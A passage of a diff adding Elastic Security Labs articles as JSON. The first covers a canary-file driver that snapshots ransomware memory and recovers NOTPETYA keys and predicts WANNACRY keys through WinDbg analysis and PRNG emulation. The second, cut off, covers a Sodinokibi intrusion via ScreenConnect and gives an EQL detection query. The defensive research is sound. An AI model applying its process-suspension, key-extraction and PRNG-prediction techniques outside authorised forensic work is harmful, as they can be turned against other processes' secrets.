internally operates to be effective. Ransomware families are diverse in how they operate, which underlines that there may never be a universal solution to combat all strains. Understanding this diversity also emphasizes the importance of our technique, which provides significant insights about ransomware.\n\nFrom a high level, the sequence of actions that ransomware executes is usually summarized as such:\n\n 1. **Delivery**: this can be done in several ways, from social engineering to 0-day/1-day vulnerability exploitation. This approach can also rely on weak passwords to remotely infect targets.\n 2. **C2 Communication**: once the execution starts, the ransomware may communicate with the C2 to exchange configuration and share information about the victim. This step can also leave room for the C2 to have a kill switch in place, preventing further infection.\n 3. **Encryption**: after establishing a cryptographic context, the process recursively browses the file system, looks for files with specific extensions, and encrypts them.\n 4. **Extortion**: after sharing the decryption keys with the C2, the ransomware will drop a ransom note and (usually very visibly) notify the infected user of its actions and ways to obtain the decryption key. At that point, all cryptographic context allowing recovery may already be lost.\n 5. 
**Propagation**: if possible, the ransomware may try to infect more systems automatically.\n\nHowever, looking at a lower level reveals that each ransomware family operates quite uniquely: for example, focusing on the delivery step, the notorious [WANNACRY ransomware](https://www.cisa.gov/sites/default/files/FactSheets/NCCIC%20ICS_FactSheet_WannaCry_Ransomware_S508C.pdf) spread via a vulnerability in the Windows operating system, known as [EternalBlue](https://arstechnica.com/information-technology/2017/04/nsa-leaking-shadow-brokers-just-dumped-its-most-damaging-release-yet/); whereas [LOCKBIT](https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit) variants tend to infect using phishing emails, exploit kits, or by leveraging compromised Remote Desktop Protocol (RDP) credentials. \n\nDuring this research, it was mostly the third step that interested us, as it is usually where detection and prevention can be most effective, such as with our canary protection.\n\n### Understanding the Canary files feature in Elastic Endpoint \n\nOriginating in Elastic 7.14, Elastic Endpoint ransomware protection uses [canary files](https://www.elastic.co/blog/deterring-ransomware-for-state-and-local-government) to honeypot ransomware: a process (over-)writing one of these specific files provides a high-confidence indicator that it is attempting to encrypt all files.\n\nA canary file acts and looks exactly like any other file - it can have valid content (DOCX, PDF, etc.), be hidden, or be marked as a system file to avoid user tampering. However, canary files cannot be “fingerprinted” and avoided by ransomware. All of these factors lead to a robust indicator for ransomware access.\n\nEven though canary files are very successful in providing indicators for ransomware, it is hard to be certain on Windows systems that no file has been encrypted *before* the detection (and, if desired, termination) occurs. 
This is not a product defect; it is due to the very structure of how MiniFilters work on Windows. Therefore, even though the attack is thwarted, some files may have been encrypted. Worse, if the process is terminated, the possibility of retrieving the original content may be completely lost.\n\nAnd this is where our ON Week research began…\n\n## Extending our canary protection to generate process snapshots\n\n### The basic underlying concept\n\nThe idea behind this first research was as follows:\n - At the kernel level, detect write access attempts to a file with a specific name (our canary)\n - From userland, generate a process dump of the culprit process attempting the write operation and signal the driver to continue execution as designed\n - Analyze the process dumps\n\nWith ON Week limited to one week, that was our initial time frame for developing a prototype. \n\n### Implementation\n\n#### In kernel land\n\nDeveloping a MiniFilter driver to monitor write access to files with specific names was relatively straightforward by following the [MiniFilter API documentation](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/_ifsk/):\n \n 1. Declare the filter table containing the callbacks we want to install, one for write access when invoking ```NtWriteFile()```, and another for when attempting to write to a mapped section\n\n\n\n\n 2. 
Create and register the filter, including the file name pattern to monitor, and start filtering:\n \n\n_Image 2: Declaring a filename pattern to inspect for the MiniFilter driver_\nOnce our filter is registered to the Filter Manager, write accesses will go through our driver’s callbacks when specific syscalls are triggered: by ```NtWriteFile``` when a process attempts to write a buffer to a file, or by ```NtCreateSection()``` when a process attempts to create a section with file-backed mappings with write access (```SECTION_MAP_WRITE```).\n\n\n\n\nAs we can see, either action will result in the invoking process being suspended (a call to our function ```SuspendProcessById```), allowing a userland process to snapshot its memory. The following video summarizes all those steps:\n\n\n\n\n#### In user land\n\nGenerating memory dumps is a robust mechanism well anchored into Windows and a significant part of its Error Reporting feature - or [WER](https://learn.microsoft.com/en-us/windows/win32/wer/windows-error-reporting). Through simple and explicit API calls, like [```MiniDumpWriteDump```](https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump), any user or program may dump (if permissions permit) the complete memory layout and content of a target process, along with more information depending on flags passed during invocation, such as:\n - handle information\n - thread information\n - unloaded module details and more\n\nA complete reference list of available types can be consulted [here](https://github.com/Skulltrail192/One-Core-Api/blob/76729f2108c2afca24d89efc92b814a07b92a62e/dll/win32/dbghelp/compat.h#L914-L931).\n\nWe decided to use memory dumps, designed for debugging software, to extend our ransomware protection feature's existing canary file capabilities. When ransomware is detected, we generate a complete memory dump before the process is terminated. 
Using memory dumps against malware has tremendous advantages, including:\n - Revealing the process memory layout, which is particularly useful when packing has obscured the memory regions\n - Disclosing all memory contents of the process as it is running, including unwiped memory regions since Windows does not immediately erase memory for performance reasons \n - Providing stable and safe ways to experiment against malware through emulation\n\n\n\n\nVery quickly, we had a stable and reliable way to detect canary write access and generate complete memory dumps of the ransomware triggering them. Due to time constraints, we selected two popular families to test the analysis phase of our project: NOTPETYA and WANNACRY.\n\nThe prototype code can be found [here](https://github.com/calladoum-elastic/canary-driver) and is not intended for production use. Please experiment at your own risk, using non-production systems.\n\n### Real-life examples\n\n#### Recovering keys from process runtime: the case of NOTPETYA\n\nWhy NOTPETYA? It was a good first candidate because it encrypts all files with one random session key. It also uses strong cryptography:\n - RSA-1024 for the host-level asymmetric encryption key\n - A unique AES-128 CBC key used for encrypting the files\n\nUsing the driver and agent crafted above, we could easily have NOTPETYA (SHA1 [`027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745`](https://www.virustotal.com/gui/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745)) run in a contained environment and get a process minidump at a very predictable runtime location. \n\nOur current design causes the driver to capture the writes synchronously, so we know exactly where we are in the process runtime when analyzing dump files. 
However, we still needed some reverse engineering to learn exactly how the session keys were generated.\n\nReversing this NOTPETYA DLL proved to be straightforward, which helped us move quickly: \n - After some initial checks, the DLL attempts to iterate through all the possible drive letters, and for each match (i.e., the letter - such as `C:\\` - exists) a `0x20`-byte thread context will be created to proceed with the encryption\n\n\n\n\n - Each thread initializes its own cryptographic context using the Microsoft CryptoAPI; we note the use of AES-CBC 128 bits\n \n\n\n\n - Each thread encrypts the files recursively (with a maximum recursion level of 15), dropping the ransom message and destroying the cryptographic context\n\n\n\n\n - The file encryption itself is performed using file-backed mappings to overwrite files of specifically targeted extensions:\n\n\n\n\nThis leaves us with a very basic stack-based structure for the context:\n\n```c\nstruct _THREAD_CONTEXT { /* sizeof=0x20, align=0x4, mappedto_50 */\n    /* 00000000 */ WORD lpswzRootPathName[4];\n    /* 00000008 */ HANDLE hProvider;\n    /* 0000000C */ PVOID field_C;\n    /* 00000010 */ LPVOID pBase64Data;\n    /* 00000014 */ HCRYPTPROV hKey;\n    /* 00000018 */ DWORD field_18;\n    /* 0000001C */ HANDLE hFile;\n};\n```\n\nEquipped with that knowledge, we could explore further in the dump. Since we know write accesses were made using ```kernel32!CreateFileMapping```, this means ```ntdll!NtCreateSection``` is called, and we can isolate the active thread that triggered the syscall to the canary file:\n\n```\ndx @$curprocess.Threads.Where( t => t.Stack.Frames.First().ToDisplayString().Contains(\"NtCreateSection\") )\n```\n\n\n\n\nAs explained previously, we’ve isolated the context session and know it’s located in the stack. 
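Given that layout, retrieving ```hKey``` from a captured context is a fixed-offset read at ```+0x14```. A minimal sketch of that read follows; the packed bytes are fabricated to mirror the dump values shown here, not parsed from a real minidump:

```python
import struct

# 32-bit _THREAD_CONTEXT (0x20 bytes): WORD[4] root path, then six DWORDs:
# hProvider (+0x08), field_C, pBase64Data, hKey (+0x14), field_18, hFile.
def hkey_from_context(ctx: bytes) -> int:
    # Read the little-endian DWORD at offset 0x14 (the hKey member).
    return struct.unpack_from("<I", ctx, 0x14)[0]

# Fabricated context mirroring the dps output above: L"C:\" plus pointers.
fake_ctx = struct.pack(
    "<4H6I",
    0x43, 0x3A, 0x5C, 0x00,   # lpswzRootPathName: L"C:\"
    0x00538418, 0x00000000,   # hProvider, field_C
    0x04060550, 0x0048FC48,   # pBase64Data, hKey
    0x00000000, 0x00000000,   # field_18, hFile
)
```

On a real dump, `ctx` would be the `0x20` bytes read from the thread's stack at the frame offset located with WinDbg.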
From the base pointer to the session context, we can retrieve the cryptographic context from the context structure member ```_THREAD_CONTEXT.hKey``` located at offset 0x14.\n\n```\n0:007:x86> dx @$curthread.Stack.Frames[3].Attributes.FrameOffset + 0x10\n@$curthread.Stack.Frames[3].Attributes.FrameOffset + 0x10 : 0x518d210\n0:007:x86> dps poi(0x518d210) l6\n004859a0 003a0043\n004859a4 0000005c\n004859a8 00538418\n004859ac 00000000\n004859b0 04060550 \n004859b4 0048fc48 <<< hKey\n0:007:x86> dps 0048fc48 \n0048fc48 74a850c0 rsaenh!CPGenKey\n0048fc4c 74a9ad90 rsaenh!CPDeriveKey\n0048fc50 74a886c0 rsaenh!CPDestroyKey\n0048fc54 74a9c770 rsaenh!CPSetKeyParam\n0048fc58 74a898c0 rsaenh!CPGetKeyParam\n0048fc5c 74a84c40 rsaenh!CPExportKey\n0048fc60 74a86290 rsaenh!CPImportKey\n0048fc64 74a99880 rsaenh!CPEncrypt\n0048fc68 74a8a500 rsaenh!CPDecrypt\n0048fc6c 74a9b5c0 rsaenh!CPDuplicateKey\n0048fc70 00538418 \n0048fc74 e3155764 <<< hCryptKey\n0048fc78 22222222\n[...]\n```\n\nThe crypto context structures are not made publicly accessible by Microsoft but have been [reverse-engineered](https://forums.codeguru.com/showthread.php?79163-Structure-of-HCRYPTKEY-Data&s=b0a1fb3f896437fc13727105e44628d6&p=2234957#post2234957)\n\n```\nstruct HCRYPTKEY\n{\n void* CPGenKey;\n void* CPDeriveKey;\n void* CPDestroyKey;\n void* CPSetKeyParam;\n void* CPGetKeyParam;\n void* CPExportKey;\n void* CPImportKey;\n void* CPEncrypt;\n void* CPDecrypt;\n void* CPDuplicateKey;\n HCRYPTPROV hCryptProv;\n magic_s *magic; // XOR-ed\n};\nstruct magic_s\n{\n key_data_s *key_data;\n};\n\nstruct key_data_s\n{\n void *unknown; // XOR-ed pointer\n uint32_t alg;\n uint32_t flags;\n uint32_t key_size;\n void* key_bytes;\n};\n```\n\nFrom this context, we can extract and decode the location of the AES structure, as the key is known to be [```0xE35A172C```](https://forums.codeguru.com/showthread.php?79163-Structure-of-HCRYPTKEY-Data&s=b0a1fb3f896437fc13727105e44628d6&p=2234957#post2234957) for 32-bit 
processes:\n\n```\n0:007:x86> ? e3155764^ 0xE35A172C\nEvaluate expression: 5193800 = 004f4048\n\n0:007:x86> dps poi(004f4048 ) l5\n0053cdd0 e3152844 // /* +0 */ unknown\n0053cdd4 0000660e // /* +4 */ alg\n0053cdd8 00000001 // /* +8 */ flags\n0053cddc 00000010 // /* +c */ key_size\n0053cde0 0053ce70 // /* +10 */ key_bytes\n```\n\nFrom the dump, we also know the type (AES-CBC), location in memory (`0x053ce70`), and size (`0x10`) of the key. The session key can be successfully retrieved! \n\n\n\n\nNot only does this allow complete decryption of all encrypted files for this process, but the astute observer would have noticed that all [those steps can be automated](https://gist.github.com/calladoum-elastic/8a142ad8b20de048a0edb2ec6fde2660), allowing us to create decryptors using just the generated memory dump!\n\n\n\n\nTo see this process fully, you can watch the [demo](https://youtu.be/UCZFAV9EveQ) and check out the [code](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-notpetya_extract_key_from_dump-py) on GitHub. \n\nWe can even create scripts for decryption that would apply to all machines infected with the same variant. Even though WinDbg is the tool of choice, all those steps can be completely automated, making this approach very scalable.\n\n### Predicting encryption keys from the process runtime: the case of WANNACRY\n\nWANNACRY is another ransomware family we felt qualified for this experiment, as it is well-known and – most importantly for this research – used a more complex logic for file encryption:\n\n\n\n\n#### Deep dive into Windows (Pseudo-)random Number generation\n\nTo encrypt files, WANNACRY uses Windows' encryption library and generates one random AES key per file by means of the high-level API function [```advapi32!CryptGenRandom```](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptgenrandom). Each key is associated with the corresponding file, then RSA-encrypted and submitted to its C2. 
By design, the approach we used against NOTPETYA will not work here. WANNACRY offered us a different challenge, once again demonstrating that having a complete memory dump provides other invaluable resources.\n\nRandom number generation is often less random than most people think. Generating a truly random number is both challenging and expensive, and this challenge is at the heart of any cryptographic algorithm. \n\nWindows (not unlike other OS) generates [random numbers in a pseudo-random way](https://en.wikipedia.org/wiki/Pseudorandom_number_generator). This means the random number generator derives an initial state (called a seed) with a cryptographic function (for instance, XorShift or Mersenne-Twister). One of the logical consequences of using PRNG is that knowing the state of the random generator at a moment T allows us to know precisely all random values at T+1, T+2, etc. Note that this is not a weakness as randomness is a highly complex and performance-costly operation; this approach is a great trade-off. \n\nWe will be taking advantage of this property to defeat WANNACRY. Knowing that WANNACRY repeatedly will call CryptGenRandom to generate the AES encryption for each file, if we have a way to know those values strictly through emulation of the minidump file, then we will also know the possible AES keys. This looks promising but may conceal several roadblocks. \n\nTaking a step back, what is CryptGenRandom in the first place – what does it do? The [MSDN](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptgenrandom) informs us that this (deprecated) function fills up a buffer with random content using a [Cryptographic Service Provider](https://learn.microsoft.com/en-us/windows/desktop/SecGloss/c-gly)(HCRYPTPROV). Setting a breakpoint to CryptGenRandom allows us to look under the hood with WinDbg on a Windows 11 x64. 
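The PRNG property described above is easy to demonstrate with a toy generator. The xorshift32 below is not the algorithm Windows uses (CNG's generator is AES-based); it only illustrates that knowing the state at time T fixes every value at T+1, T+2, and so on:

```python
def xorshift32(state: int) -> int:
    # Toy Marsaglia xorshift PRNG, masked to 32 bits; illustrative only.
    state ^= (state << 13) & 0xFFFFFFFF
    state ^= state >> 17
    state ^= (state << 5) & 0xFFFFFFFF
    return state

def sequence(seed: int, count: int) -> list:
    # Replay `count` outputs starting from a known internal state.
    out, state = [], seed
    for _ in range(count):
        state = xorshift32(state)
        out.append(state)
    return out

# Two generators restored with the same state produce identical futures.
a = sequence(0xDEADBEEF, 5)
b = sequence(0xDEADBEEF, 5)
```

This is exactly the property the emulation approach exploits: a minidump freezes the generator state, so replaying it yields the values the ransomware would have produced next.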
We can then easily traverse the high-level APIs and observe that ```advapi32!CryptGenRandom``` is a wrapper to ```cryptsp!CryptGenRandom```, which in turn leads us to the ```CPGenRandom``` function in ```rsaenh.dll```.\n\n```\n0:000> g\nBreakpoint 9 hit\nCRYPTSP!CryptGenRandom+0x29:\n00007ffc`990c1699 488b8be0000000 mov rcx,qword ptr [rbx+0E0h] ds:000001e1`38ade010=e35a16cde1cff7d0\n0:000> dps @rbx\n000001e1`38addf30 00007ffc`987956d0 rsaenh!CPAcquireContext\n000001e1`38addf38 00007ffc`987951e0 rsaenh!CPReleaseContext\n000001e1`38addf40 00007ffc`98791140 rsaenh!CPGenKey\n000001e1`38addf48 00007ffc`987a8f80 rsaenh!CPDeriveKey\n000001e1`38addf50 00007ffc`987948a0 rsaenh!CPDestroyKey\n000001e1`38addf58 00007ffc`987aaac0 rsaenh!CPSetKeyParam\n[...]\n\n0:000> t\nCRYPTSP!CryptGenRandom+0x3c:\n00007ffc`990c16ac ff1506c50000 call qword ptr [CRYPTSP!_guard_dispatch_icall_fptr (00007ffc`990cdbb8)] ds:00007ffc`990cdbb8={CRYPTSP!guard_dispatch_icall_nop (00007ffc`990c4d30)}\n\n0:000> r rax, rcx,rdx ,r8\nrax=00007ffc987954d0 rcx=e35a16cde1cff7d0 rdx=0000000000000010 r8=00000065859bfe70\n\n0:000> .printf \"%y\\n\", @rax\nrsaenh!CPGenRandom (00007ffc`987954d0)\n```\n\nWhen ```CRYPTSP!CryptGenRandom``` is invoked, the RCX register holds the pointer to the encoded crypto provider, which is XOR encoded with the magic constant ```0xE35A172CD96214A0``` (Remember the ```0xE35A172C``` magic constant we used earlier? This is its 64-bit version counterpart). Looking at ```rsaenh!CPGenRandom``` in IDA made clear the cryptographic provider handle serves only as a check to determine the correct validity of the context passed to the function but has no real implication about the randomness generation.\n\n\n\n\nThe entire randomness generation logic is deported to the function ```cryptbase!SystemFunction036```, which simply takes two arguments: the buffer to receive the random data and its length. 
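Decoding the provider and key handles seen in the debugger is a single XOR with the per-bitness magic constant; the 32-bit NOTPETYA decode from earlier can be reproduced in a couple of lines:

```python
# rsaenh handle-encoding magic constants (32-bit, and its 64-bit counterpart).
MAGIC_32 = 0xE35A172C
MAGIC_64 = 0xE35A172CD96214A0

def decode_handle(encoded: int, magic: int) -> int:
    # XOR is an involution: the same operation both encodes and decodes.
    return encoded ^ magic

# 32-bit HCRYPTKEY pointer from the NOTPETYA dump: `? e3155764 ^ 0xE35A172C`
ptr32 = decode_handle(0xE3155764, MAGIC_32)  # 0x004F4048
# 64-bit encoded provider taken from the RCX value in the WinDbg session.
ptr64 = decode_handle(0xE35A16CDE1CFF7D0, MAGIC_64)
```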
This was great news because random number generation had no external factor an attacker could use at runtime to make the generation more complex. Going farther into the rabbit hole, we realized that ```cryptbase!SystemFunction036``` itself is nothing more than a light wrapper for ```bcryptprimitives!ProcessPrng```, which – by the name of the function – seems to match our expectations.\n\nThe ```bcryptprimitives``` DLL is part of the [Cryptographic Next Generation API](https://learn.microsoft.com/en-us/windows/win32/seccng/cng-portal) (CNG) and is quite complex. Fully reversing would be out-of-scope for this research, so we only focused on the parts we're interested in. First, we observed that once loaded in the process, the library initializes the process seed - either from the [```rdrand```](https://www.felixcloutier.com/x86/rdrand) instruction or from a VTL1 call to the [```IumKernelState```](https://learn.microsoft.com/en-us/windows/win32/procthread/isolated-user-mode--ium--processes) trustlet in the explicitly named ```InitUmRootRngState``` function. Then, it populates a random number generator state table and updates the RNG seed version state in the ```ntdll!_KUSER_SHARED_DATA::RNGSeedVersion```.\n\n\n\n\nWhen ```ProcessPrng``` is invoked, the generation of the next pseudo-random number is determined by a CPU-specific state. To be precise, the processor number on which the current thread is running is used as an index to load and generate the next number. We’ll explain more later, but this will be challenging in the future. Using this state information, the next number is produced by invoking ```AesRNGState_generate```, storing the result inside the buffer given in an argument.\n\n\n\n\nThis is a non-negligible issue for what we’re trying to accomplish. On multiprocessor-aware Windows (which all modern PCs are), it is hard to consistently know the processor number the thread is running on, making generation prediction impossible. 
However, Windows provides ways to affect the scheduler, as shown below.\n\n\n\n\n#### Pseudo-random number prediction through user-mode emulation of the memory dump\n\nKeep in sight that to defeat WANNACRY, we need to be able to execute the function ```cryptbase!SystemFunction036``` directly from the memory dump. We can do this with an emulator (like QEMU or Bochs) by mapping the execution context (populating the memory layout, restoring the TEB/PEB, etc.) gathered from the memory dump of the ransomware, which we did following these steps:\n 1. Parse the user-mode dump to [extract and map all the memory layout](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-emulate_cryptrandomgen-py-L272-L287); for this step, we used the Python bindings of the [udmp-parser](https://github.com/0vercl0k/udmp-parser) library\n 2. Fully [reconstruct a working memory layout in an emulator](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-emulate_cryptrandomgen-py-L291-L322), for which [bochscpu](https://github.com/yrp604/bochscpu) along with its [Python bindings](https://github.com/hugsy/bochscpu-python) were used\n 3. [Rebuild a valid thread context](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-emulate_cryptrandomgen-py-L354-L370) by finding the function ```cryptbase!SystemFunction036``` and emulating the runtime\n\nHowever, we still lack the ability to predict which CPU the thread invoking ```cryptbase!SystemFunction036``` will be running on and, therefore, cannot accurately predict the subsequent values returned by the function. On a single-core machine, this is not a problem, as our PRNG state table only holds one entry, and this approach was tested to work perfectly out-of-the-box.
However, it fails on multi-core systems, as only the first call to ```cryptbase!SystemFunction036``` would return the correct random values.\n\n\n\n\nFor accurate emulation on multi-core machines, we would need to know the processor number on which the next thread calling ```cryptbase!SystemFunction036``` will run, which is fairly impossible to know in advance. Two possible approaches were tested:\n 1. From the dump, we have knowledge of the entire PRNG state table. Because of this, we can make the emulation script hook the function ```ntdll!RtlGetCurrentProcessorNumberEx``` and use it to determine the index in the random table, then have it generate all the values for a specific core. This approach proved successful but extremely tedious, especially at scale, as automation would have to explore exponentially many candidate sequences to retrieve the correctly generated one.\n 2. The other option intervenes during the canary detection itself. Once the canary confirms the process is ransomware, we can restrict the culprit process’s CPU affinity to a single CPU, whose index we can choose freely. This can be done from kernel or user mode as long as the targeted process is opened with the [```PROCESS_SET_INFORMATION```](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-setprocessaffinitymask) access right. This processor index determines the entry taken in the `AesStateTable` array, and doing so allows us to reliably predict all future values of the PRNG via emulation.\n\n\n\n\nTo see the WANNACRY process in full, you can watch the [demo](https://youtu.be/uXqI0ZSqZhI). We also have the [code](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27) available for review on GitHub.\n\nTesting both techniques showed that it is possible to predict the future values of the PRNG with the minidump at our disposal.
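The effect of the second approach can be sketched with the same kind of toy model (SHA-256 again stands in for the AES state update; the table and values are illustrative, not the real `AesStateTable` layout): once the process is pinned to a known CPU and the state table is recovered from the dump, the offline replay and the live process stay in lockstep.

```python
import hashlib


def advance(state: bytes) -> bytes:
    # Stand-in for one AES-based state update producing the next output block.
    return hashlib.sha256(state).digest()


# Per-CPU state table as recovered from the minidump (toy values).
dumped_table = [hashlib.sha256(b"dump" + bytes([i])).digest() for i in range(8)]

PINNED_CPU = 3  # index we chose when forcing the process affinity mask

# The live process and the offline emulation start from the same dumped state,
# so every future output of the pinned process is predictable.
live = emulated = dumped_table[PINNED_CPU]
for _ in range(5):
    live, emulated = advance(live), advance(emulated)
    assert live == emulated
print("all predicted values matched")
```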
This would be immensely helpful against ransomware like WANNACRY, which uses the Windows PRNG to generate unique AES keys for each encrypted file.\n\n## Incorporating this research into the Elastic Endpoint\n\nON Week at Elastic is a place for experimenting without constraints and often leads to great improvements to the existing Elastic solutions. \n\nProcess snapshot generation was added to Elastic Security in version [8.11](https://www.elastic.co/blog/whats-new-elastic-security-8-11-0). With protection enabled, should ransomware be detected, the endpoint will generate a complete process memory dump before resuming execution, likely leading to the termination of the ransomware process. We hope this simple addition can assist DFIR teams further by providing better insight into what the ransomware was attempting. \n\nRecent news has shown that process memory dumps can leak a [great amount of valuable private information](https://www.msn.com/en-us/news/technology/microsoft-china-stole-secret-key-that-unlocked-us-govt-email-from-crash-debug-dump/ar-AA1glLPJ) if made available publicly. Therefore, it must be stressed that no memory dump is ever submitted to Elastic, even with the feature enabled. The dump file is generated (and compressed) by the endpoint locally, and the resulting file is stored within Elastic’s secure installation folder (by default, ```$ElasticInstallPath\\Endpoint\\cache\\RansomwareDumps```). This way, the dump files cannot be easily tampered with by attackers but are easily accessible to forensics and incident response teams to assist them in the recovery process.\n\nLet’s demonstrate this feature in action on a fresh Elastic 8.11 against NOTPETYA: [watch the demo](https://youtu.be/d16yKWUf3dI)\n\n## Closing remarks\n\nThis concluded our ON Week research with quite a positive outcome. Did we come up with a bulletproof solution against all ransomware? No, and such a thing likely won’t ever exist.
As we’ve underlined in the introduction, ransomware comes in so many types and varieties that a single solution for all of them seems impossible.\n\nWhat this research found, however, is that this approach offers a great trade-off between false positive (FP) risk, system requirements, and potential outcome. There is very little risk in snapshotting a process’s memory once it is flagged as ransomware by the canary feature. In the case of a false positive, the computer would simply end up with a dump file in a protected location (and ZIP compression drastically reduces the footprint on disk).\n\nWhile this is not the perfect ransomware solution, offering a memory dump of the ransomware can boost forensic work and potentially allow teams to recover or even predict session encryption keys. Complete memory dumps can be an amazing ally in debugging and forensics because they provide an exhaustive view of how things happen at runtime. And thanks to emulation, we can confidently retrace some of the steps that led to a compromise and hopefully fix it.\n"
+ },
+ "title": "Ransomware in the honeypot: how we capture keys with sticky canary files",
+ "slug": "ransomware-in-the-honeypot-how-we-capture-keys",
+ "date": "2024-02-23",
+ "description": "This article describes the process of capturing encryption keys from ransomware using Elastic Defend ransomware protection.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "christophe-alladoum"
+ }
+ ],
+ "image": "photo-edited-07.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "ransomware",
+ "canary",
+ "honeypot"
+ ]
+ },
+ "id": "security_labs_content-ransomware_in_the_honeypot_how_we_capture_keys-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_interrupted_sodinokibi_and_the_supply_chain-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_interrupted_sodinokibi_and_the_supply_chain-md.json
new file mode 100644
index 00000000000..aee19001daf
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_interrupted_sodinokibi_and_the_supply_chain-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Ransomware, interrupted: Sodinokibi and the supply chain\"\nslug: \"ransomware-interrupted-sodinokibi-and-the-supply-chain\"\ndate: \"2022-06-02\"\ndescription: \"Learn how Elastic Endpoint Security's behavior-based protections prevented a targeted ransomware attack on multiple endpoints.\"\nauthor:\n - slug: david-french\nimage: \"ransomware-prevention-blog-thumbnail.jpg\"\ncategory:\n - slug: campaigns\n---\n\nLast month, the [Elastic Security](https://www.elastic.co/blog/introducing-elastic-endpoint-security) Protections Team prevented an attempted ransomware attack targeting an organization monitored by one of our customers, an IT Managed Service Provider (MSP). We analyzed the alerts that were generated after an adversary’s process injection attempts were prevented by [Elastic Endpoint Security](https://www.elastic.co/products/endpoint-security) on several endpoints. Adversaries often attempt to inject their malicious code into a running process before encrypting and holding the victim’s data to ransom.\n\nThe behavior we observed in this case is consistent with reports of malicious actors, who have targeted MSPs in order to deploy ransomware at an enterprise scale. 
By abusing the trust relationships between MSPs and their customers, attacks of this nature scale in impact — capable of crippling small businesses, interfering with transportation, or even disrupting a critical municipal public service.\n\nIt is important to note in this case that the adversary accessed the target environment via another MSP, who is not an Elastic Security customer — we do not have specific details about that environment or how it may have been compromised.\n\nIn this post, we’ll discuss the malicious behavior that we observed and prevented, why this attack is often successful in the wild, and what you can do to reduce the effectiveness of this type of attack in your enterprise.\n\n> Elastic Security Intelligence and Analytics, a team within Elastic Security Engineering, uses anonymized security telemetry from participating customers to track threats and improve products, a function that includes collecting alert metadata. By monitoring patterns of events affecting many customers, we’re able to make time-sensitive decisions that improve our ability to mitigate emerging threats or provide the community with essential information.\n\n## Preventing malicious process injection\n\nThe earliest evidence of compromise was detected when several [process injection](https://attack.mitre.org/techniques/T1055/) attempts were prevented. Process injection can be used to execute code in the address space of a running process. Adversaries often execute this technique in an attempt to avoid detection by security products, or to run their malicious code in a process running at a higher integrity level to elevate their privileges.\n\n\n\nAnalyzing the process injection alerts established that PowerShell, a powerful native scripting framework, was leveraged in an attempt to inject shellcode into itself — a behavior that is usually malicious. 
The powershell.exe process was created as a descendant of ScreenConnect.WindowsClient.exe — a remote desktop support application. This type of software is used to allow IT administrators to connect to remote computers and provide support to end users, but applications like this are often abused by adversaries — a tactic known as “living off the land.”\n\nThe figure below depicts the unusual process lineage associated with this case in Resolver™, our visualization that displays events associated with an attack.\n\n\n\nNotice that cmd.exe and powershell.exe are both descendants of the ScreenConnect.WindowsClient.exe process. This is suspicious considering their ability to execute malicious commands or scripts, but in isolation this does not necessarily indicate malicious activity. Baselining your environment and understanding normal process relationships in your enterprise is crucial to hunting for, detecting, or responding to malicious behavior.\n\nIn this case, reviewing the processes and their command line arguments revealed that the adversary leveraged ScreenConnect remote desktop software to connect and copy a batch file to the target endpoint. Examining one of the cmd.exe processes in Resolver™ showed that the batch file contained a Base64-encoded PowerShell script that was subsequently executed.\n\n## Detecting and preventing unwanted behaviors with EQL\n\nWhile this potential target protected by Elastic Endpoint Security avoided an expensive ransomware outbreak, many MSPs are still coming to grips with this methodology. This adversary understands that service providers often have implicit trust with their customers and that makes providers of all kinds valuable.\n\nOnce an adversary has obtained initial access to their target environment, it is typical for them to seek out and abuse implicit trust relationships as seen in this case. 
The victim organization trusts the connections to their environment from their MSP via the remote desktop support application, which introduces the risk of [supply chain compromise](https://attack.mitre.org/techniques/T1195/).\n\nWhen considering how to monitor and defend these trust relationships, focusing on applications that connect from the trusted party into your network is a good starting point. Blacklisting descendant processes of ScreenConnect may not be a viable solution to prevent this malicious behavior, as this may prevent legitimate support personnel from being effective. However, a security monitoring team may decide that a descendant process of ScreenConnect that is using the network is suspicious and want to detect and prevent that behavior. This is possible using [Elastic’s Event Query Language (EQL)](https://www.endgame.com/blog/technical-blog/getting-started-eql) and is a generic approach to developing environmental awareness.\n\nThe following EQL query searches for a sequence of two events that are tied together using the process’s unique process ID (PID). The first event looks for a process that is a descendant of ScreenConnect\\*.exe. The second event looks for network activity from the descendant process. This query can easily be expanded to include other remote access software or filter expected activity in your environment.\n\n```\nsequence by unique_pid\n [process where descendant of [process where process_name == \"ScreenConnect*.exe\"]]\n [network where true]\n```\n\nWith Elastic Endpoint Security, it is also possible to configure a [Reflex response action](https://www.elastic.co/blog/what-is-reflex), which is a way for customers to implement their own custom prevention rules. 
